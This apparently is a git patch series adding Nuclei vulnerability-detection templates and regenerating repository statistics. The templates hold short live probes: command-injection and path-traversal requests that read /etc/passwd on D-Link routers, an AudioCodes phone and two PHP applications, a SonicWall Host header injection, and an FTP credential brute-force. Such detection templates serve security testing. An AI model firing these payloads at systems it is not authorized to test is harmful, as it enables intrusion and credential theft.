| | +| triconsole | 1 | | | | | | | | | +| metabase | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| xampp | 1 | | | | | | | | | +| okiko | 1 | | | | | | | | | +| plugin | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| nweb2fax | 1 | | | | | | | | | +| mkdocs | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| smi | 1 | | | | | | | | | +| wondercms | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| sangfor | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| actuator | 1 | | | | | | | | | +| autocomplete | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| luftguitar | 1 | | | | | | | | | +| redis | 1 | | | | | | | | | +| craftcms | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| expn | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| mantis | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| bash | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| meraki | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| zyxel | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| tracer | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| sceditor | 1 | | | | | | | | | +| froxlor | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| k8s | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| influxdb | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| whm | 1 | | | | | | | | | +| manager | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| graph | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| linkedin | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| exponentcms | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| wing-ftp | 1 | | | | | | | | | +| camunda | 1 | | | | | | | | | +| mod-proxy | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| calendly | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| expressjs | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | +| wooyun | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| addpac | 1 | | | | | | | | | +| chevereto | 1 | | | | | | | | | +| lighttpd | 1 | | | | | | | | | +| api-manager | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| gurock | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| mapbox | 1 | | | | | | | | | +| gitlist | 1 | | | | | | | | | +| graphite | 1 | | | | | | | | | +| apos | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| visualtools | 1 | | | | | | | | | +| cerebro | 1 | | | | | | | | | +| weather | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| gunicorn | 1 | | | | | | | | | +| gitea | 1 | | | | | | | | | +| placeos | 1 | | | | | | | | | +| spip | 1 | | | | | | | | | +| listserv | 1 | | | | | | | | | +| couchbase | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| wavlink | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| xvr | 1 | | | | | | | | | +| geocode | 1 | | | | | | | | | +| owa | 1 | | | | | | | | | +| minimouse | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| route | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| ghost | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| sqlite | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| stripe | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| glowroot | 1 | | | | | | | | | +| sendgrid | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| newrelic | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| werkzeug | 1 | | | | | | | | | +| oidc | 1 | | | | | | | | | +| elevation | 1 | | | | | | | | | +| syslog | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 17c9c10e8a..e941b1bca2 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 828 | daffainfo | 288 | cves | 832 | info | 749 | http | 2205 | -| lfi | 340 | pikpikcu | 280 | vulnerabilities | 327 | high | 645 | file | 50 | -| panel | 272 | dhiyaneshdk | 278 | exposed-panels | 269 | medium | 474 | network | 45 | +| cve | 827 | daffainfo | 288 | cves | 831 | info | 743 | http | 2195 | +| lfi | 337 | pikpikcu | 280 | vulnerabilities | 324 | high | 641 | file | 50 | +| panel | 267 | dhiyaneshdk | 273 | exposed-panels | 264 | medium | 474 | network | 45 | | xss | 258 | pdteam | 201 | technologies | 201 | critical | 294 | dns | 12 | -| wordpress | 252 | geeknik | 162 | exposures | 191 | low | 155 | | | -| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 140 | | | | | +| wordpress | 249 | geeknik | 162 | exposures | 191 | low | 155 | | | +| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 139 | | | | | | rce | 212 | gy741 | 81 | takeovers | 65 | | | | | | tech | 195 | pussycat0x | 72 | token-spray | 63 | | | | | -| wp-plugin | 175 | princechaddha | 66 | default-logins | 60 | | | | | +| wp-plugin | 172 | princechaddha | 66 | default-logins | 60 | | | | | | cve2020 | 164 | madrobot | 63 | file | 50 | | | | | From 59fd3b88f714af295cd437a120902a218175456e Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 18 Oct 2021 02:54:34 +0530 Subject: [PATCH 10/54] misc update --- network/ftp-weak-credentials.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/network/ftp-weak-credentials.yaml b/network/ftp-weak-credentials.yaml index 57eb4e53ac..ba537cbaa2 100644 --- a/network/ftp-weak-credentials.yaml +++ b/network/ftp-weak-credentials.yaml @@ -10,11 +10,12 @@ network: - inputs: - data: "USER {{username}}\r\nPASS {{password}}\r\n" + host: - "{{Hostname}}:21" - "{{Hostname}}" - stop-at-first-match: true + attack: clusterbomb payloads: username: - admin @@ -28,8 +29,6 @@ network: - pass1 - stingray - attack: clusterbomb - matchers: - type: word words: From 3d6a079b4237687ef71794802272f3893a33fc27 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 18 Oct 2021 03:14:23 +0530 Subject: [PATCH 11/54] workflow update --- .github/workflows/template-validate.yml | 4 ++-- workflows/rabbitmq-workflow.yaml | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index e652333875..a158694063 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -23,11 +23,11 @@ jobs: env: GO111MODULE: on run: | - go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@master + go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@dev shell: bash - name: Template Validation run: | nuclei -validate -t . - # nuclei -validate -w ./workflows # Disabling temporarily + nuclei -validate -w ./workflows shell: bash \ No newline at end of file diff --git a/workflows/rabbitmq-workflow.yaml b/workflows/rabbitmq-workflow.yaml index c5fc2b4324..30c015ac40 100644 --- a/workflows/rabbitmq-workflow.yaml +++ b/workflows/rabbitmq-workflow.yaml @@ -9,4 +9,4 @@ workflows: - template: exposed-panels/rabbitmq-dashboard.yaml subtemplates: - - template: default-logins/rabbitmq/rabbitmq-default-admin.yaml \ No newline at end of file + - template: default-logins/rabbitmq/ \ No newline at end of file From c7fc202ef16f264d2214b8e948b6267fa60bf036 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Mon, 18 Oct 2021 08:24:29 +0900 Subject: [PATCH 12/54] Create CVE-2021-20031.yaml A Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages. An issue was discovered in Sonicwall NAS, SonicWall Analyzer version 8.5.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack Signed-off-by: GwanYeong Kim --- cves/2021/CVE-2021-20031.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2021/CVE-2021-20031.yaml diff --git a/cves/2021/CVE-2021-20031.yaml b/cves/2021/CVE-2021-20031.yaml new file mode 100644 index 0000000000..081be48518 --- /dev/null +++ b/cves/2021/CVE-2021-20031.yaml @@ -0,0 +1,31 @@ +id: CVE-2021-20031 + +info: + name: Sonicwall SonicOS 7.0 - Host Header Injection + author: gy741 + severity: medium + description: | + A Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages. An issue was discovered in Sonicwall NAS, SonicWall Analyzer version 8.5.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-20031 + - https://www.exploit-db.com/exploits/50414 + tags: cve,cve2021,sonicwall + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{randstr}}.tld + + matchers-condition: and + matchers: + - type: word + words: + - 'https://{{randstr}}.tld/auth.html' + - 'Please be patient as you are being re-directed' + part: body + condition: and + + - type: status + status: + - 200 From 98d8a15123ea72dcdab68e0700b28146985d8443 Mon Sep 17 00:00:00 2001 From: Wisnu Pramoedya <62658181+wisnupramoedya@users.noreply.github.com> Date: Mon, 18 Oct 2021 19:44:09 +0700 Subject: [PATCH 13/54] Create CVE-2018-10093.yaml --- cves/2018/CVE-2018-10093.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2018/CVE-2018-10093.yaml diff --git a/cves/2018/CVE-2018-10093.yaml b/cves/2018/CVE-2018-10093.yaml new file mode 100644 index 0000000000..94e57900ac --- /dev/null +++ b/cves/2018/CVE-2018-10093.yaml @@ -0,0 +1,27 @@ +id: CVE-2018-10093 + +info: + name: AudioCode 400HD - RCE + author: wisnupramoedya + severity: critical + description: AudioCodes IP phone 420HD devices using firmware version 2.2.12.126 allow Remote Code Execution. + reference: + - https://www.exploit-db.com/exploits/46164 + - https://nvd.nist.gov/vuln/detail/CVE-2018-10093 + tags: cve,cve2018,rce,iot + +requests: + - method: GET + path: + - "{{BaseURL}}/command.cgi?cat%20/etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "admin:.*:" + + - type: status + status: + - 200 From 7d007d29f0ebb9fd91a4116b1776ffdbadce3f86 Mon Sep 17 00:00:00 2001 From: Wisnu Pramoedya <62658181+wisnupramoedya@users.noreply.github.com> Date: Mon, 18 Oct 2021 19:56:22 +0700 Subject: [PATCH 14/54] Create CVE-2018-10823.yaml --- cves/2018/CVE-2018-10823.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2018/CVE-2018-10823.yaml diff --git a/cves/2018/CVE-2018-10823.yaml b/cves/2018/CVE-2018-10823.yaml new file mode 100644 index 0000000000..3bfb44909c --- /dev/null +++ b/cves/2018/CVE-2018-10823.yaml @@ -0,0 +1,27 @@ +id: CVE-2018-10823 + +info: + name: D-Link Routers - Command Injection + author: wisnupramoedya + severity: high + description: An issue was discovered on D-Link DWR-116 through 1.06, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02, and DWR-111 through 1.01 devices. An authenticated attacker may execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals. + reference: + - https://www.exploit-db.com/exploits/45676 + - https://nvd.nist.gov/vuln/detail/CVE-2018-10823 + tags: cve,cve2018,rce,iot,dlink + +requests: + - method: GET + path: + - "{{BaseURL}}/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 89f9d65d7d6337e44dea272d3a2d8e603f70cda4 Mon Sep 17 00:00:00 2001 From: Wisnu Pramoedya <62658181+wisnupramoedya@users.noreply.github.com> Date: Mon, 18 Oct 2021 20:00:57 +0700 Subject: [PATCH 15/54] Create CVE-2018-13980.yaml --- cves/2018/CVE-2018-13980.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2018/CVE-2018-13980.yaml diff --git a/cves/2018/CVE-2018-13980.yaml b/cves/2018/CVE-2018-13980.yaml new file mode 100644 index 0000000000..ce92e39900 --- /dev/null +++ b/cves/2018/CVE-2018-13980.yaml @@ -0,0 +1,27 @@ +id: CVE-2018-13980 + +info: + name: Zeta Producer Desktop CMS 14.2.0 - Local File Disclosure + author: wisnupramoedya + severity: high + description: The websites that were built from Zeta Producer Desktop CMS before 14.2.1 are vulnerable to unauthenticated file disclosure if the plugin "filebrowser" is installed, because of assets/php/filebrowser/filebrowser.main.php?file=../ directory traversal. + reference: + - https://www.exploit-db.com/exploits/45016 + - https://nvd.nist.gov/vuln/detail/CVE-2018-13980 + tags: cve,cve2018,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From cf1b818d5b8b6a34532f1009ed9fbc05bf21e348 Mon Sep 17 00:00:00 2001 From: Wisnu Pramoedya <62658181+wisnupramoedya@users.noreply.github.com> Date: Mon, 18 Oct 2021 20:04:38 +0700 Subject: [PATCH 16/54] Create CVE-2018-12054.yaml --- cves/2018/CVE-2018-12054.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2018/CVE-2018-12054.yaml diff --git a/cves/2018/CVE-2018-12054.yaml b/cves/2018/CVE-2018-12054.yaml new file mode 100644 index 0000000000..1db786a56f --- /dev/null +++ b/cves/2018/CVE-2018-12054.yaml @@ -0,0 +1,27 @@ +id: CVE-2018-12054 + +info: + name: Schools Alert Management Script - Arbitrary File Read + author: wisnupramoedya + severity: high + description: Arbitrary File Read exists in PHP Scripts Mall Schools Alert Management Script via the f parameter in img.php, aka absolute path traversal. + reference: + - https://www.exploit-db.com/exploits/44874 + - https://www.cvedetails.com/cve/CVE-2018-12054 + tags: cve,cve2018,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/img.php?f=/./etc/./passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 79656346cdbaad2b1e4cbac7c44ff2ac519a9660 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 18 Oct 2021 15:14:58 +0000 Subject: [PATCH 17/54] Auto Generated CVE annotations [Mon Oct 18 15:14:58 UTC 2021] :robot: --- cves/2018/CVE-2018-12054.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2018/CVE-2018-12054.yaml b/cves/2018/CVE-2018-12054.yaml index 1db786a56f..7daf35a964 100644 --- a/cves/2018/CVE-2018-12054.yaml +++ b/cves/2018/CVE-2018-12054.yaml @@ -9,6 +9,11 @@ info: - https://www.exploit-db.com/exploits/44874 - https://www.cvedetails.com/cve/CVE-2018-12054 tags: cve,cve2018,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-12054 + cwe-id: CWE-22 requests: - method: GET From 868264f8395e25528acbe7f80a6d31b5b9957453 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 18 Oct 2021 20:46:01 +0530 Subject: [PATCH 18/54] Update CVE-2018-10823.yaml --- cves/2018/CVE-2018-10823.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-10823.yaml b/cves/2018/CVE-2018-10823.yaml index 3bfb44909c..550c39395d 100644 --- a/cves/2018/CVE-2018-10823.yaml +++ b/cves/2018/CVE-2018-10823.yaml @@ -8,7 +8,7 @@ info: reference: - https://www.exploit-db.com/exploits/45676 - https://nvd.nist.gov/vuln/detail/CVE-2018-10823 - tags: cve,cve2018,rce,iot,dlink + tags: cve,cve2018,rce,iot,dlink,router requests: - method: GET From 0762d645fb39231ffc362d06f3db447e9fbb3a0c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 18 Oct 2021 15:16:57 +0000 Subject: [PATCH 19/54] Auto Generated CVE annotations [Mon Oct 18 15:16:57 UTC 2021] :robot: --- cves/2018/CVE-2018-13980.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-13980.yaml b/cves/2018/CVE-2018-13980.yaml index ce92e39900..3f6afd77f7 100644 --- a/cves/2018/CVE-2018-13980.yaml +++ b/cves/2018/CVE-2018-13980.yaml @@ -3,12 +3,17 @@ id: CVE-2018-13980 info: name: Zeta Producer Desktop CMS 14.2.0 - Local File Disclosure author: wisnupramoedya - severity: high + severity: medium description: The websites that were built from Zeta Producer Desktop CMS before 14.2.1 are vulnerable to unauthenticated file disclosure if the plugin "filebrowser" is installed, because of assets/php/filebrowser/filebrowser.main.php?file=../ directory traversal. reference: - https://www.exploit-db.com/exploits/45016 - https://nvd.nist.gov/vuln/detail/CVE-2018-13980 tags: cve,cve2018,lfi + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.50 + cve-id: CVE-2018-13980 + cwe-id: CWE-22 requests: - method: GET From d2d4d01846f7462dceaf508557f1ee5a06ac650c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 18 Oct 2021 15:19:41 +0000 Subject: [PATCH 20/54] Auto Generated CVE annotations [Mon Oct 18 15:19:41 UTC 2021] :robot: --- cves/2018/CVE-2018-10093.yaml | 7 ++++++- cves/2018/CVE-2018-10823.yaml | 5 +++++ 2 files changed, 11 insertions(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-10093.yaml b/cves/2018/CVE-2018-10093.yaml index 94e57900ac..bdb9d75bc5 100644 --- a/cves/2018/CVE-2018-10093.yaml +++ b/cves/2018/CVE-2018-10093.yaml @@ -3,12 +3,17 @@ id: CVE-2018-10093 info: name: AudioCode 400HD - RCE author: wisnupramoedya - severity: critical + severity: high description: AudioCodes IP phone 420HD devices using firmware version 2.2.12.126 allow Remote Code Execution. reference: - https://www.exploit-db.com/exploits/46164 - https://nvd.nist.gov/vuln/detail/CVE-2018-10093 tags: cve,cve2018,rce,iot + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2018-10093 + cwe-id: CWE-862 requests: - method: GET diff --git a/cves/2018/CVE-2018-10823.yaml b/cves/2018/CVE-2018-10823.yaml index 550c39395d..81ca5b0d08 100644 --- a/cves/2018/CVE-2018-10823.yaml +++ b/cves/2018/CVE-2018-10823.yaml @@ -9,6 +9,11 @@ info: - https://www.exploit-db.com/exploits/45676 - https://nvd.nist.gov/vuln/detail/CVE-2018-10823 tags: cve,cve2018,rce,iot,dlink,router + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2018-10823 + cwe-id: CWE-78 requests: - method: GET From 6346c6e93a063a4115039457d68bcadef773c6ae Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 18 Oct 2021 20:52:36 +0530 Subject: [PATCH 21/54] Update CVE-2021-20031.yaml --- cves/2021/CVE-2021-20031.yaml | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/cves/2021/CVE-2021-20031.yaml b/cves/2021/CVE-2021-20031.yaml index 081be48518..e54a086b78 100644 --- a/cves/2021/CVE-2021-20031.yaml +++ b/cves/2021/CVE-2021-20031.yaml @@ -3,13 +3,15 @@ id: CVE-2021-20031 info: name: Sonicwall SonicOS 7.0 - Host Header Injection author: gy741 - severity: medium - description: | - A Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages. An issue was discovered in Sonicwall NAS, SonicWall Analyzer version 8.5.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack + severity: low + description: A Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages. An issue was discovered in Sonicwall NAS, SonicWall Analyzer version 8.5.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-20031 - https://www.exploit-db.com/exploits/50414 - tags: cve,cve2021,sonicwall + - https://nvd.nist.gov/vuln/detail/CVE-2021-20031 + metadata: + google-dork: inurl:"auth.html" intitle:"SonicWall" + google-dork: intitle:"SonicWall Analyzer Login" + tags: cve,cve2021,sonicwall,redirect requests: - raw: From 9e37e202bdf3d2820814c096ebb9b52124e7fa80 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 18 Oct 2021 20:55:47 +0530 Subject: [PATCH 22/54] Update CVE-2021-20031.yaml --- cves/2021/CVE-2021-20031.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-20031.yaml b/cves/2021/CVE-2021-20031.yaml index e54a086b78..97ff54f001 100644 --- a/cves/2021/CVE-2021-20031.yaml +++ b/cves/2021/CVE-2021-20031.yaml @@ -9,8 +9,7 @@ info: - https://www.exploit-db.com/exploits/50414 - https://nvd.nist.gov/vuln/detail/CVE-2021-20031 metadata: - google-dork: inurl:"auth.html" intitle:"SonicWall" - google-dork: intitle:"SonicWall Analyzer Login" + google-dork: inurl:"auth.html" intitle:"SonicWall" tags: cve,cve2021,sonicwall,redirect requests: From 9d0685ec243d8808eab4a321810efdb2f6a93349 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 18 Oct 2021 20:58:18 +0530 Subject: [PATCH 23/54] Create sonicwall-analyzer-login.yaml --- exposed-panels/sonicwall-analyzer-login.yaml | 27 ++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 exposed-panels/sonicwall-analyzer-login.yaml diff --git a/exposed-panels/sonicwall-analyzer-login.yaml b/exposed-panels/sonicwall-analyzer-login.yaml new file mode 100644 index 0000000000..64381e0725 --- /dev/null +++ b/exposed-panels/sonicwall-analyzer-login.yaml @@ -0,0 +1,27 @@ +id: sonicwall-analyzer-login + +info: + name: SonicWall Analyzer Login + author: princechaddha + severity: info + metadata: + google-dork: intitle:"SonicWall Analyzer Login" + tags: tech,sonicwall + +requests: + - method: GET + path: + - "{{BaseURL}}/sgms/auth" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Dell SonicWALL Analyzer Login" + - "SonicWall Analyzer Login" + condition: or + + - type: status + status: + - 200 From 199add7f53dd9781667d6375e18a9c98692cf3e7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 18 Oct 2021 20:59:05 +0530 Subject: [PATCH 24/54] Revert "Create sonicwall-analyzer-login.yaml" This reverts commit 9d0685ec243d8808eab4a321810efdb2f6a93349. --- exposed-panels/sonicwall-analyzer-login.yaml | 27 -------------------- 1 file changed, 27 deletions(-) delete mode 100644 exposed-panels/sonicwall-analyzer-login.yaml diff --git a/exposed-panels/sonicwall-analyzer-login.yaml b/exposed-panels/sonicwall-analyzer-login.yaml deleted file mode 100644 index 64381e0725..0000000000 --- a/exposed-panels/sonicwall-analyzer-login.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: sonicwall-analyzer-login - -info: - name: SonicWall Analyzer Login - author: princechaddha - severity: info - metadata: - google-dork: intitle:"SonicWall Analyzer Login" - tags: tech,sonicwall - -requests: - - method: GET - path: - - "{{BaseURL}}/sgms/auth" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Dell SonicWALL Analyzer Login" - - "SonicWall Analyzer Login" - condition: or - - - type: status - status: - - 200 From 2d50e768ce6d0843f1241c8fdb979f8ff6fcaeb1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 18 Oct 2021 15:30:13 +0000 Subject: [PATCH 26/54] Auto Generated Templates Stats [Mon Oct 18 15:30:13 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1801 +++++++++++++++++++++--------------------- TOP-10.md | 18 +- 3 files changed, 911 insertions(+), 910 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 4bed7d43d2..3b3ab8672e 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":827},{"name":"lfi","count":337},{"name":"panel","count":267},{"name":"xss","count":258},{"name":"wordpress","count":249},{"name":"exposure","count":239},{"name":"rce","count":212},{"name":"tech","count":195},{"name":"wp-plugin","count":172},{"name":"cve2020","count":164},{"name":"cve2021","count":155},{"name":"joomla","count":128},{"name":"cve2010","count":109},{"name":"cve2019","count":97},{"name":"config","count":95},{"name":"cve2018","count":88},{"name":"apache","count":73},{"name":"takeover","count":69},{"name":"default-login","count":68},{"name":"oob","count":68},{"name":"iot","count":68},{"name":"token","count":67},{"name":"token-spray","count":63},{"name":"cve2017","count":51},{"name":"file","count":50},{"name":"unauth","count":49},{"name":"network","count":43},{"name":"ssrf","count":41},{"name":"sqli","count":40},{"name":"","count":38},{"name":"redirect","count":37},{"name":"cve2016","count":37},{"name":"oracle","count":36},{"name":"logs","count":30},{"name":"google","count":30},{"name":"atlassian","count":28},{"name":"jira","count":28},{"name":"cve2015","count":28},{"name":"cisco","count":27},{"name":"listing","count":27},{"name":"cve2014","count":27},{"name":"generic","count":24},{"name":"auth-bypass","count":23},{"name":"misc","count":23},{"name":"disclosure","count":23},{"name":"router","count":21},{"name":"misconfig","count":20},{"name":"aem","count":19},{"name":"springboot","count":18},{"name":"cve2012","count":18},{"name":"sap","count":18},{"name":"debug","count":18},{"name":"php","count":16},{"name":"devops","count":15},{"name":"cve2011","count":15},{"name":"login","count":14},{"name":"struts","count":14},{"name":"weblogic","count":14},{"name":"aws","count":14},{"name":"cve2009","count":14},{"name":"fuzz","count":14},{"name":"dns","count":13},{"name":"android","count":13},{"name":"zoho","count":13},{"name":"adobe","count":13},{"name":"deserialization","count":13},{"name":"jenkins","count":12},{"name":"manageengine","count":12},{"name":"dlink","count":12},{"name":"wp-theme","count":12},{"name":"cve2013","count":11},{"name":"magento","count":11},{"name":"intrusive","count":10},{"name":"hp","count":10},{"name":"dell","count":10},{"name":"xxe","count":10},{"name":"kubernetes","count":9},{"name":"ftp","count":9},{"name":"vmware","count":9},{"name":"nginx","count":8},{"name":"backup","count":8},{"name":"cve2008","count":8},{"name":"ruijie","count":8},{"name":"fastjson","count":8},{"name":"cnvd","count":8},{"name":"rails","count":8},{"name":"ibm","count":8},{"name":"microsoft","count":8},{"name":"airflow","count":8},{"name":"gitlab","count":8},{"name":"scada","count":8},{"name":"coldfusion","count":7},{"name":"cms","count":7},{"name":"confluence","count":7},{"name":"files","count":7},{"name":"netgear","count":7},{"name":"api","count":6},{"name":"camera","count":6},{"name":"django","count":6},{"name":"citrix","count":6},{"name":"laravel","count":6},{"name":"jetty","count":6},{"name":"rconfig","count":6},{"name":"drupal","count":6},{"name":"nodejs","count":6},{"name":"docker","count":6},{"name":"lucee","count":6},{"name":"solr","count":6},{"name":"fileupload","count":6},{"name":"ssti","count":5},{"name":"tomcat","count":5},{"name":"circarlife","count":5},{"name":"phpmyadmin","count":5},{"name":"iis","count":5},{"name":"java","count":5},{"name":"crlf","count":5},{"name":"printer","count":5},{"name":"jolokia","count":5},{"name":"windows","count":5},{"name":"headless","count":5},{"name":"dedecms","count":5},{"name":"symantec","count":4},{"name":"traversal","count":4},{"name":"solarwinds","count":4},{"name":"zimbra","count":4},{"name":"webserver","count":4},